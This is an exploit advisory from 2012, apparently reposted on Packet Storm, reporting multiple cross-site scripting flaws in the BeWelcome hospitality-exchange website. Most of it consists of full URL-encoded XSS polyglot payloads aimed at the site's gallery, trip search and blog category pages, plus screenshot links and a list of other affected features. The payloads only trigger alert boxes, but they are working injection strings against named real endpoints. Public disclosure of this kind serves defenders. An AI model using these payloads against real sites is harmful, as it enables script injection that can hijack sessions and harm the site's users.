BeWelcome suffers from a cross site scripting vulnerability.
35c8bce7f617046de2f83324928d12c7# Exploit Title: BeWelcome Cross Site Scripting
# Date: 10.02.2012
# Author: Sony
# Software Link: http://www.bewelcome.org
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/bw-rox-cross-site-scripting.html
..................................................................
About BeWelcome:
http://redmine.bewelcome.org/projects/bw-drupal
http://trac.bewelcome.org/
http://bw.guaka.org/
Well, we have a Multiple Cross Site Scripting Vulnerabilities.
Demo:
in the gallery:
http://www.bewelcome.org/gallery/show/user/sony/images/%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://2.bp.blogspot.com/-N1L_Rk0Agzw/TzTLoQzGqLI/AAAAAAAAAdk/hPBJnsAG_uc/s1600/galery.JPG
In the group:
http://4.bp.blogspot.com/-WIiIow6KlxE/TzTL2eFwB4I/AAAAAAAAAdw/rjPX_PQsAjU/s1600/group.JPG
http://2.bp.blogspot.com/-Zk_7swxEeWY/TzTL8tiRtzI/AAAAAAAAAd8/im2s7JqUMtY/s1600/group2.JPG
in the search "trips":
http://www.bewelcome.org/trip/search?s=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&submit=Search+trips
http://1.bp.blogspot.com/-upC9swXCjic/TzTMUNjSzzI/AAAAAAAAAeI/0zTzuUq53Xo/s1600/search.JPG
in the blogs:
http://www.bewelcome.org/blog/cat%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://4.bp.blogspot.com/-tj3SZCU9Lpo/TzTMvjffzXI/AAAAAAAAAeU/TpmcYAGBi1A/s1600/blog.JPG
in the "send invite":
http://4.bp.blogspot.com/--o2H_bAa9pU/TzTM4X8gVdI/AAAAAAAAAeg/XieM3FxVWEA/s1600/invite.JPG
I think in the profile too.
Etc..
..................................................................
InSecurity.Ro
Because we care, we're security aware!
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!